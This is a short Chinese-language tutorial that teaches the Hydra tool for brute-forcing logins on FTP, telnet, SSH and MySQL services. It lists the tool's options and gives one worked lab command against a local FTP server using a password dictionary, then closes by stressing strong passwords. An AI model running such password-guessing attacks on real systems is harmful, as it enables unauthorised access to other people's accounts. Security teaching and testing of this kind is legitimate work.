大家应该都知道暴力破解的原理,但却不知道遇见telnet和ftp等服务和数据库如何破解,今天小R就教大家如何利用一个工具就能对其破解。
今天要给大家介绍的工具是:hydra(中文名:九头蛇)
这个名听起来很好记吧
由于原理和过程都一样,所以我只挑其中的一种来做实例。就以FTP为例吧
先讲一下hydra的使用方法:
支持的爆破的服务有:ftp telnet mysql ssh等多种服务
hydra <参数><IP地址><服务名>
注意:hydra后面的参数是区分大小写,所以一定要注意,小R一开始就是没注意这个,费脑子费了好长时间。
-s <port> 指定端口
-l <username> 指定用户名
-L <usrname.txt>指定用户名的字典
-p<pdname> 指定密码
-P<pdname>指定密码的字典
-R 继续上次的爆破
-v 显示爆破的详细过程
-t 设置线程数 (默认为16个线程)
试验环境:
宿主机(win7):192.168.1.1 (FTP服务器) 帐号:test 密码:admin
攻击机(kali) :192.168.1.2 (自带hydra)
kali操作:
1. 直接在终端上输入:hydra -v -l test -P somd5-top1w.txt -t 10 192.168.1.1 ftp
如图所示:
2. 这个时候看FTP服务器:
很明显这是被爆破。所以讲密码的重要性很大,尽可能的设到最长(含特殊字符)